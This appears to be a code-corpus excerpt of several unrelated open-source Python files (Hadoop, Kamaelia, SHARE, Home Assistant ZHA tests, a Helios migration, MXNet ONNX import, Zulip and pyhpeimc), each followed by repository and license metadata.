class AbacusMapper(ValueAggregatorMapper):
def map(self, key, value, output, reporter):
ValueAggregatorMapper.map(self, key, value, output, reporter);
class AbacusReducer(ValueAggregatorReducer):
def reduce(self, key, values, output, reporter):
ValueAggregatorReducer.reduce(self, key, values, output, reporter);
class AbacusCombiner(ValueAggregatorCombiner):
def reduce(self, key, values, output, reporter):
ValueAggregatorCombiner.reduce(self, key, values, output, reporter);
def printUsage(code):
print "Abacus <input> <output> <numOfReducers> <inputformat> <specfile>"
sys.exit(code)
def main(args):
if len(args) < 6:
printUsage(1);
inDir = args[1];
outDir = args[2];
numOfReducers = int(args[3]);
theInputFormat = args[4];
specFile = args[5];
print "numOfReducers: ", numOfReducers, "theInputFormat: ", theInputFormat, "specFile: ", specFile
conf = JobConf(AbacusMapper);
conf.setJobName("recordcount");
conf.addDefaultResource(Path(specFile));
if theInputFormat=="textinputformat":
conf.setInputFormat(TextInputFormat);
else:
conf.setInputFormat(SequenceFileInputFormat);
conf.setOutputFormat(TextOutputFormat);
conf.setMapOutputKeyClass(Text);
conf.setMapOutputValueClass(Text);
conf.setOutputKeyClass(Text);
conf.setOutputValueClass(Text);
conf.setNumMapTasks(1);
conf.setNumReduceTasks(numOfReducers);
conf.setMapperClass(AbacusMapper);
conf.setCombinerClass(AbacusCombiner);
conf.setReducerClass(AbacusReducer);
conf.setInputPath(Path(args[1]))
conf.setOutputPath(Path(args[2]))
JobClient.runJob(conf);
if __name__ == "__main__":
main(sys.argv)
| moreus/hadoop | hadoop-0.11.2/src/contrib/abacus/examples/pyAbacus/JythonAbacus.py | Python | apache-2.0 | 2,577 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
import Axon
from Axon.Ipc import producerFinished
class Chooser(Axon.Component.component):
"""Chooses items out of a set, as directed by commands sent to its inbox
Emits the first item at initialisation, then whenever a command is received
it emits another item (unless you're asking it to step beyond the start or
end of the set)
"""
Inboxes = { "inbox" : "receive commands",
"control" : ""
}
Outboxes = { "outbox" : "emits chosen items",
"signal" : ""
}
def __init__(self, items = [], loop = False):
"""Initialisation.
items = set of items that can be iterated over. Must be finite.
If an iterator is supplied, it is enumerated into a list during initialisation.
"""
super(Chooser,self).__init__()
self.items = list(items)
self.index = 0
self.loop = loop
def shutdown(self):
if self.dataReady("control"):
message = self.recv("control")
if isinstance(message, shutdownMicroprocess):
self.send(message, "signal")
return True
return False
def main(self):
try:
self.send( self.items[self.index], "outbox")
except IndexError:
pass
done = False
while not done:
yield 1
while self.dataReady("inbox"):
send = True
msg = self.recv("inbox")
if msg == "SAME":
pass
elif msg == "NEXT":
self.index = self.index + 1
if self.index >= len(self.items):
if self.loop:
self.index = 0
else:
self.index = len(self.items)-1
elif msg == "PREV":
self.index = self.index - 1
if self.index < 0:
if self.loop:
self.index = len(self.items)-1
else:
self.index = 0
elif msg == "FIRST":
self.index = 0
elif msg == "LAST":
self.index = 1
try:
self.send( self.items[self.index], "outbox")
except IndexError:
pass
done = self.shutdown()
__kamaelia_components__ = ( Chooser, )
| sparkslabs/kamaelia_ | Sketches/MPS/Random/MSChooser.py | Python | apache-2.0 | 3,281 |
from share.transform.chain import * # noqa
class AgentIdentifier(Parser):
uri = IRI(ctx)
class WorkIdentifier(Parser):
uri = IRI(ctx)
class Tag(Parser):
name = ctx
class ThroughTags(Parser):
tag = Delegate(Tag, ctx)
class Person(Parser):
given_name = ParseName(ctx.creator).first
family_name = ParseName(ctx.creator).last
additional_name = ParseName(ctx.creator).middle
suffix = ParseName(ctx.creator).suffix
class Creator(Parser):
agent = Delegate(Person, ctx)
cited_as = ctx.creator
order_cited = ctx('index')
class Organization(Parser):
name = ctx.publisher
identifiers = Map(Delegate(AgentIdentifier), ctx.issn)
class Publisher(Parser):
agent = Delegate(Organization, ctx)
class Extra:
publication_name = ctx.publicationName
class Article(Parser):
title = ctx.title
description = ctx.abstract
rights = ctx.copyright
date_published = ParseDate(ctx.publicationDate)
date_updated = ParseDate(ctx.publicationDate)
identifiers = Map(
Delegate(WorkIdentifier),
ctx.doi,
ctx.identifier,
Map(ctx.value, ctx.url),
)
related_agents = Concat(
Map(Delegate(Creator), ctx.creators),
Map(Delegate(Publisher), ctx)
)
tags = Map(Delegate(ThroughTags), ctx.genre)
class Extra:
openaccess = ctx.openaccess
ending_page = Try(ctx.endingPage)
issue_type = Try(ctx.issuetype)
number = ctx.number
starting_page = ctx.startingPage
topicalCollection = Try(ctx.topicalCollection)
journalid = Try(ctx.journalid)
issn = Try(ctx.issn)
class BioMedCentralTransformer(ChainTransformer):
VERSION = 1
root_parser = Article
| CenterForOpenScience/SHARE | share/transformers/com_biomedcentral.py | Python | apache-2.0 | 1,752 |
"""Test zha sensor."""
from unittest import mock
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.clusters.homeautomation as homeautomation
import zigpy.zcl.clusters.measurement as measurement
import zigpy.zcl.clusters.smartenergy as smartenergy
from homeassistant.components.sensor import DOMAIN
import homeassistant.config as config_util
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
CONF_UNIT_SYSTEM,
CONF_UNIT_SYSTEM_IMPERIAL,
CONF_UNIT_SYSTEM_METRIC,
POWER_WATT,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
UNIT_PERCENTAGE,
)
from homeassistant.helpers import restore_state
from homeassistant.util import dt as dt_util
from .common import (
async_enable_traffic,
async_test_rejoin,
find_entity_id,
send_attribute_report,
send_attributes_report,
)
async def async_test_humidity(hass, cluster, entity_id):
"""Test humidity sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 1000, 2: 100})
assert_state(hass, entity_id, "10.0", UNIT_PERCENTAGE)
async def async_test_temperature(hass, cluster, entity_id):
"""Test temperature sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 2900, 2: 100})
assert_state(hass, entity_id, "29.0", TEMP_CELSIUS)
async def async_test_pressure(hass, cluster, entity_id):
"""Test pressure sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 1000, 2: 10000})
assert_state(hass, entity_id, "1000", "hPa")
await send_attributes_report(hass, cluster, {0: 1000, 20: -1, 16: 10000})
assert_state(hass, entity_id, "1000", "hPa")
async def async_test_illuminance(hass, cluster, entity_id):
"""Test illuminance sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 10, 2: 20})
assert_state(hass, entity_id, "1.0", "lx")
async def async_test_metering(hass, cluster, entity_id):
"""Test metering sensor."""
await send_attributes_report(hass, cluster, {1025: 1, 1024: 12345, 1026: 100})
assert_state(hass, entity_id, "12345.0", "unknown")
async def async_test_electrical_measurement(hass, cluster, entity_id):
"""Test electrical measurement sensor."""
with mock.patch(
(
"homeassistant.components.zha.core.channels.homeautomation"
".ElectricalMeasurementChannel.divisor"
),
new_callable=mock.PropertyMock,
) as divisor_mock:
divisor_mock.return_value = 1
await send_attributes_report(hass, cluster, {0: 1, 1291: 100, 10: 1000})
assert_state(hass, entity_id, "100", POWER_WATT)
await send_attributes_report(hass, cluster, {0: 1, 1291: 99, 10: 1000})
assert_state(hass, entity_id, "99", POWER_WATT)
divisor_mock.return_value = 10
await send_attributes_report(hass, cluster, {0: 1, 1291: 1000, 10: 5000})
assert_state(hass, entity_id, "100", POWER_WATT)
await send_attributes_report(hass, cluster, {0: 1, 1291: 99, 10: 5000})
assert_state(hass, entity_id, "9.9", POWER_WATT)
@pytest.mark.parametrize(
"cluster_id, test_func, report_count",
(
(measurement.RelativeHumidity.cluster_id, async_test_humidity, 1),
(measurement.TemperatureMeasurement.cluster_id, async_test_temperature, 1),
(measurement.PressureMeasurement.cluster_id, async_test_pressure, 1),
(measurement.IlluminanceMeasurement.cluster_id, async_test_illuminance, 1),
(smartenergy.Metering.cluster_id, async_test_metering, 1),
(
homeautomation.ElectricalMeasurement.cluster_id,
async_test_electrical_measurement,
1,
),
),
)
async def test_sensor(
hass,
zigpy_device_mock,
zha_device_joined_restored,
cluster_id,
test_func,
report_count,
):
"""Test zha sensor platform."""
zigpy_device = zigpy_device_mock(
{
1: {
"in_clusters": [cluster_id, general.Basic.cluster_id],
"out_cluster": [],
"device_type": 0x0000,
}
}
)
cluster = zigpy_device.endpoints[1].in_clusters[cluster_id]
zha_device = await zha_device_joined_restored(zigpy_device)
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
await async_enable_traffic(hass, [zha_device], enabled=False)
await hass.async_block_till_done()
# ensure the sensor entity was created
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and devices
await async_enable_traffic(hass, [zha_device])
# test that the sensor now have a state of unknown
assert hass.states.get(entity_id).state == STATE_UNKNOWN
# test sensor associated logic
await test_func(hass, cluster, entity_id)
# test rejoin
await async_test_rejoin(hass, zigpy_device, [cluster], (report_count,))
def assert_state(hass, entity_id, state, unit_of_measurement):
"""Check that the state is what is expected.
This is used to ensure that the logic in each sensor class handled the
attribute report it received correctly.
"""
hass_state = hass.states.get(entity_id)
assert hass_state.state == state
assert hass_state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == unit_of_measurement
@pytest.fixture
def hass_ms(hass):
"""Hass instance with measurement system."""
async def _hass_ms(meas_sys):
await config_util.async_process_ha_core_config(
hass, {CONF_UNIT_SYSTEM: meas_sys}
)
await hass.async_block_till_done()
return hass
return _hass_ms
@pytest.fixture
def core_rs(hass_storage):
"""Core.restore_state fixture."""
def _storage(entity_id, uom, state):
now = dt_util.utcnow().isoformat()
hass_storage[restore_state.STORAGE_KEY] = {
"version": restore_state.STORAGE_VERSION,
"key": restore_state.STORAGE_KEY,
"data": [
{
"state": {
"entity_id": entity_id,
"state": str(state),
"attributes": {ATTR_UNIT_OF_MEASUREMENT: uom},
"last_changed": now,
"last_updated": now,
"context": {
"id": "3c2243ff5f30447eb12e7348cfd5b8ff",
"user_id": None,
},
},
"last_seen": now,
}
],
}
return
return _storage
@pytest.mark.parametrize(
"uom, raw_temp, expected, restore",
[
(TEMP_CELSIUS, 2900, 29, False),
(TEMP_CELSIUS, 2900, 29, True),
(TEMP_FAHRENHEIT, 2900, 84, False),
(TEMP_FAHRENHEIT, 2900, 84, True),
],
)
async def test_temp_uom(
uom,
raw_temp,
expected,
restore,
hass_ms,
core_rs,
zigpy_device_mock,
zha_device_restored,
):
"""Test zha temperature sensor unit of measurement."""
entity_id = "sensor.fake1026_fakemodel1026_004f3202_temperature"
if restore:
core_rs(entity_id, uom, state=(expected - 2))
hass = await hass_ms(
CONF_UNIT_SYSTEM_METRIC if uom == TEMP_CELSIUS else CONF_UNIT_SYSTEM_IMPERIAL
)
zigpy_device = zigpy_device_mock(
{
1: {
"in_clusters": [
measurement.TemperatureMeasurement.cluster_id,
general.Basic.cluster_id,
],
"out_cluster": [],
"device_type": 0x0000,
}
}
)
cluster = zigpy_device.endpoints[1].temperature
zha_device = await zha_device_restored(zigpy_device)
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
if not restore:
await async_enable_traffic(hass, [zha_device], enabled=False)
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and devices
await async_enable_traffic(hass, [zha_device])
# test that the sensors now have a state of unknown
if not restore:
assert hass.states.get(entity_id).state == STATE_UNKNOWN
await send_attribute_report(hass, cluster, 0, raw_temp)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state is not None
assert round(float(state.state)) == expected
assert state.attributes[ATTR_UNIT_OF_MEASUREMENT] == uom
async def test_electrical_measurement_init(
hass, zigpy_device_mock, zha_device_joined,
):
"""Test proper initialization of the electrical measurement cluster."""
cluster_id = homeautomation.ElectricalMeasurement.cluster_id
zigpy_device = zigpy_device_mock(
{
1: {
"in_clusters": [cluster_id, general.Basic.cluster_id],
"out_cluster": [],
"device_type": 0x0000,
}
}
)
cluster = zigpy_device.endpoints[1].in_clusters[cluster_id]
zha_device = await zha_device_joined(zigpy_device)
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
# allow traffic to flow through the gateway and devices
await async_enable_traffic(hass, [zha_device])
# test that the sensor now have a state of unknown
assert hass.states.get(entity_id).state == STATE_UNKNOWN
await send_attributes_report(hass, cluster, {0: 1, 1291: 100, 10: 1000})
assert int(hass.states.get(entity_id).state) == 100
channel = zha_device.channels.pools[0].all_channels["1:0x0b04"]
assert channel.divisor == 1
assert channel.multiplier == 1
# update power divisor
await send_attributes_report(hass, cluster, {0: 1, 1291: 20, 0x0403: 5, 10: 1000})
assert channel.divisor == 5
assert channel.multiplier == 1
assert hass.states.get(entity_id).state == "4.0"
await send_attributes_report(hass, cluster, {0: 1, 1291: 30, 0x0605: 10, 10: 1000})
assert channel.divisor == 10
assert channel.multiplier == 1
assert hass.states.get(entity_id).state == "3.0"
# update power multiplier
await send_attributes_report(hass, cluster, {0: 1, 1291: 20, 0x0402: 6, 10: 1000})
assert channel.divisor == 10
assert channel.multiplier == 6
assert hass.states.get(entity_id).state == "12.0"
await send_attributes_report(hass, cluster, {0: 1, 1291: 30, 0x0604: 20, 10: 1000})
assert channel.divisor == 10
assert channel.multiplier == 20
assert hass.states.get(entity_id).state == "60.0"
| titilambert/home-assistant | tests/components/zha/test_sensor.py | Python | apache-2.0 | 10,606 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'VoterFile.voter_file_content'
db.add_column('helios_voterfile', 'voter_file_content', self.gf('django.db.models.fields.TextField')(null=True), keep_default=False)
# Changing field 'VoterFile.voter_file'
db.alter_column('helios_voterfile', 'voter_file', self.gf('django.db.models.fields.files.FileField')(max_length=250, null=True))
def backwards(self, orm):
# Deleting field 'VoterFile.voter_file_content'
db.delete_column('helios_voterfile', 'voter_file_content')
# User chose to not deal with backwards NULL issues for 'VoterFile.voter_file'
raise RuntimeError("Cannot reverse this migration. 'VoterFile.voter_file' and its values cannot be restored.")
models = {
'helios_auth.user': {
'Meta': {'unique_together': "(('user_type', 'user_id'),)", 'object_name': 'User'},
'admin_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('helios_auth.jsonfield.JSONField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'token': ('helios_auth.jsonfield.JSONField', [], {'null': 'True'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user_type': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'helios.auditedballot': {
'Meta': {'object_name': 'AuditedBallot'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'raw_vote': ('django.db.models.fields.TextField', [], {}),
'vote_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'helios.castvote': {
'Meta': {'object_name': 'CastVote'},
'cast_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invalidated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'quarantined_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'released_from_quarantine_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'verified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'vote': ('helios.datatypes.djangofield.LDObjectField', [], {}),
'vote_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'vote_tinyhash': ('django.db.models.fields.CharField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'}),
'voter': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Voter']"})
},
'helios.election': {
'Meta': {'object_name': 'Election'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios_auth.User']"}),
'archived_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'cast_url': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'complaint_period_ends_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'datatype': ('django.db.models.fields.CharField', [], {'default': "'legacy/Election'", 'max_length': '250'}),
'description': ('django.db.models.fields.TextField', [], {}),
'election_type': ('django.db.models.fields.CharField', [], {'default': "'election'", 'max_length': '250'}),
'eligibility': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'encrypted_tally': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'featured_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'frozen_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'openreg': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'private_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'private_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'public_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'questions': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'registration_starts_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'result': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'result_proof': ('helios_auth.jsonfield.JSONField', [], {'null': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tallies_combined_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'tallying_finished_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'tallying_started_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'tallying_starts_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'use_advanced_audit_features': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'use_voter_aliases': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'voters_hash': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'voting_ended_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'voting_ends_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'voting_extended_until': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'voting_started_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'voting_starts_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'})
},
'helios.electionlog': {
'Meta': {'object_name': 'ElectionLog'},
'at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'log': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'helios.trustee': {
'Meta': {'object_name': 'Trustee'},
'decryption_factors': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'decryption_proofs': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'pok': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'public_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'public_key_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'secret_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'helios.voter': {
'Meta': {'unique_together': "(('election', 'voter_login_id'),)", 'object_name': 'Voter'},
'alias': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'cast_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios_auth.User']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vote': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'vote_hash': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'voter_email': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'voter_login_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'voter_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'voter_password': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'helios.voterfile': {
'Meta': {'object_name': 'VoterFile'},
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_voters': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'processing_finished_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'processing_started_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'voter_file': ('django.db.models.fields.files.FileField', [], {'max_length': '250', 'null': 'True'}),
'voter_file_content': ('django.db.models.fields.TextField', [], {'null': 'True'})
}
}
complete_apps = ['helios']
| dmgawel/helios-server | helios/south_migrations/0007_auto__add_field_voterfile_voter_file_content__chg_field_voterfile_vote.py | Python | apache-2.0 | 11,336 |
# coding=utf-8
# Copyright 2016 The TF-Slim Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
| google-research/tf-slim | tf_slim/training/__init__.py | Python | apache-2.0 | 701 |
from __future__ import absolute_import
from __future__ import print_function
from django.core.management.base import BaseCommand
import sys
from zerver.lib.actions import do_deactivate_realm
from zerver.models import get_realm
class Command(BaseCommand):
help = """Script to deactivate a realm."""
def add_arguments(self, parser):
parser.add_argument('domain', metavar='<domain>', type=str,
help='domain of realm to deactivate')
def handle(self, *args, **options):
realm = get_realm(options["domain"])
if realm is None:
print("Could not find realm %s" % (options["domain"],))
sys.exit(1)
print("Deactivating", options["domain"])
do_deactivate_realm(realm)
print("Done!")
| dwrpayne/zulip | zerver/management/commands/deactivate_realm.py | Python | apache-2.0 | 789 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=invalid-name,too-many-locals,no-self-use
""" Support import export formats."""
from __future__ import absolute_import as _abs
from .... import symbol
from .... import ndarray as nd
from ....base import string_types
from .import_helper import _convert_map as convert_map
class GraphProto(object): # pylint: disable=too-few-public-methods
"""A helper class for handling mxnet symbol copying from pb2.GraphProto.
Definition: https://github.com/onnx/onnx/blob/master/onnx/onnx.proto
"""
def __init__(self):
self._nodes = {}
self._params = {}
self._num_input = 0
self._num_param = 0
def _convert_operator(self, node_name, op_name, attrs, inputs):
"""Convert from onnx operator to mxnet operator.
The converter must specify conversions explicitly for incompatible name, and
apply handlers to operator attributes.
Parameters
----------
:param node_name : str
name of the node to be translated.
:param op_name : str
Operator name, such as Convolution, FullyConnected
:param attrs : dict
Dict of operator attributes
:param inputs: list
list of inputs to the operator
Returns
-------
:return mxnet_sym
Converted mxnet symbol
"""
if op_name in convert_map:
op_name, new_attrs, inputs = convert_map[op_name](attrs, inputs, self)
else:
raise NotImplementedError("Operator {} not implemented.".format(op_name))
if isinstance(op_name, string_types):
new_op = getattr(symbol, op_name, None)
if not new_op:
raise RuntimeError("Unable to map op_name {} to sym".format(op_name))
if node_name is None:
mxnet_sym = new_op(*inputs, **new_attrs)
else:
mxnet_sym = new_op(name=node_name, *inputs, **new_attrs)
return mxnet_sym
return op_name
def from_onnx(self, graph):
"""Construct symbol from onnx graph.
Parameters
----------
graph : onnx protobuf object
The loaded onnx graph
Returns
-------
sym :symbol.Symbol
The returned mxnet symbol
params : dict
A dict of name: nd.array pairs, used as pretrained weights
"""
# parse network inputs, aka parameters
for init_tensor in graph.initializer:
if not init_tensor.name.strip():
raise ValueError("Tensor's name is required.")
self._params[init_tensor.name] = self._parse_array(init_tensor)
# converting GraphProto message
for i in graph.input:
if i.name in self._params:
# i is a param instead of input
self._nodes[i.name] = symbol.Variable(name=i.name,
shape=self._params[i.name].shape)
else:
self._nodes[i.name] = symbol.Variable(name=i.name)
# For storing arg and aux params for the graph.
auxDict = {}
argDict = {}
# constructing nodes, nodes are stored as directed acyclic graph
# converting NodeProto message
for node in graph.node:
op_name = node.op_type
node_name = node.name.strip()
node_name = node_name if node_name else None
onnx_attr = self._parse_attr(node.attribute)
inputs = [self._nodes[i] for i in node.input]
mxnet_sym = self._convert_operator(node_name, op_name, onnx_attr, inputs)
for k, i in zip(list(node.output), range(len(mxnet_sym.list_outputs()))):
self._nodes[k] = mxnet_sym[i]
# splitting params into args and aux params
for args in mxnet_sym.list_arguments():
if args in self._params:
argDict.update({args: nd.array(self._params[args])})
for aux in mxnet_sym.list_auxiliary_states():
if aux in self._params:
auxDict.update({aux: nd.array(self._params[aux])})
# now return the outputs
out = [self._nodes[i.name] for i in graph.output]
if len(out) > 1:
out = symbol.Group(out)
else:
out = out[0]
return out, argDict, auxDict
def _parse_array(self, tensor_proto):
"""Grab data in TensorProto and convert to numpy array."""
try:
from onnx.numpy_helper import to_array
except ImportError:
raise ImportError("Onnx and protobuf need to be installed. "
+ "Instructions to install - https://github.com/onnx/onnx")
np_array = to_array(tensor_proto).reshape(tuple(tensor_proto.dims))
return nd.array(np_array)
def _parse_attr(self, attr_proto):
"""Convert a list of AttributeProto to a dict, with names as keys."""
attrs = {}
for a in attr_proto:
for f in ['f', 'i', 's']:
if a.HasField(f):
attrs[a.name] = getattr(a, f)
# Needed for supporting python version > 3.5
if isinstance(attrs[a.name], bytes):
attrs[a.name] = attrs[a.name].decode(encoding='utf-8')
for f in ['floats', 'ints', 'strings']:
if list(getattr(a, f)):
assert a.name not in attrs, "Only one type of attr is allowed"
attrs[a.name] = tuple(getattr(a, f))
for f in ['t', 'g']:
if a.HasField(f):
attrs[a.name] = getattr(a, f)
for f in ['tensors', 'graphs']:
if list(getattr(a, f)):
raise NotImplementedError("Filed {} is not supported in mxnet.".format(f))
if a.name not in attrs:
raise ValueError("Cannot parse attribute: \n{}\n.".format(a))
return attrs
| TuSimple/mxnet | python/mxnet/contrib/onnx/_import/import_onnx.py | Python | apache-2.0 | 6,849 |
#!/usr/bin/env python3
# author: @netmanchris
# This section imports required libraries
import requests
import json
from pyhpeimc.plat.device import *
HEADERS = {'Accept': 'application/json', 'Content-Type':
'application/json', 'Accept-encoding': 'application/json'}
"""
This section deals with HPE IMC Custom View functions
"""
def get_custom_views(auth: object, url: object, name: object = None, headers: object = HEADERS) -> object:
"""
function requires no input and returns a list of dictionaries of custom views from an HPE IMC. Optional name
argument will return only the specified view.
:param name: str containing the name of the desired custom view
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:param name: (optional) str of name of specific custom view
:return: list of dictionaties containing attributes of the custom views
:rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> all_views = get_custom_views(auth.creds, auth.url)
>>> assert type(all_views) is list
>>> assert 'name' in all_views[0]
